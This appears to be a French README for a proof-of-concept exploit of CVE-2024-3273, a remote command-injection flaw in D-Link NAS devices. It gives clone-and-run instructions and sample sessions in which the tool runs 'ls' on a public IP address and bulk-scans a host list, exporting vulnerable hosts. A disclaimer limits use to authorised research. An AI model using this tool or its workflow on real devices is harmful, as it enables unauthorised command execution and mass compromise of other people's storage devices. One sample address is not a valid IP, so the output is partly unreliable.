
Exploit pour CVE-2024-3273, supporte les hôtes uniques et multiples
Ce dépôt contient une Preuve de Concept (PoC) pour CVE-2024-3273, une vulnérabilité de sécurité découverte dans les périphériques NAS D-Link. La vulnérabilité permet aux attaquants d'exécuter des commandes arbitraires sur les appareils vulnérables.
CVE-2024-3273 est une vulnérabilité dans les périphériques NAS D-Link qui permet aux attaquants distants d'exécuter des commandes arbitraires via une requête HTTP spécialement conçue vers le point d'accès cgi-bin/nas_sharing.cgi.
Cette PoC montre comment la vulnérabilité peut être exploitée pour exécuter des commandes sur des périphériques NAS D-Link vulnérables.
requestsClonez ce dépôt :
git clone https://github.com/adhikara13/CVE-2024-3273.git
Accédez au répertoire du dépôt :
cd CVE-2024-3273
Exécutez la PoC :
python main.py
Suivez les instructions à l'écran pour choisir le périphérique cible :
host:port, et choisissez s'il faut exporter les hôtes vulnérables vers vulnerables.txt.┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 1
Enter the host: 114.32.179.200
Enter the command to run: ls
Response from 114.32.179.200:
box.cgi
codepage_mgr.cgi
download_mgr.cgi
dropbox.cgi
folder_tree.cgi
┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 2
Enter the file path containing hosts: list.txt
Export vulnerable host to vulnerables.txt? (y/n): y
Connection error for host 87.205.188.21:9290.
Connection error for host 186.212.112.141:8081.
Host 124.120.263.149:8032 is vulnerable.
Cette PoC est uniquement destinée à des fins éducatives et de recherche. Utilisez-la de manière responsable et uniquement sur des appareils que vous êtes autorisé à tester.
Les contributions sont les bienvenues ! Si vous trouvez des problèmes ou des améliorations, n'hésitez pas à ouvrir une issue ou à créer une pull request.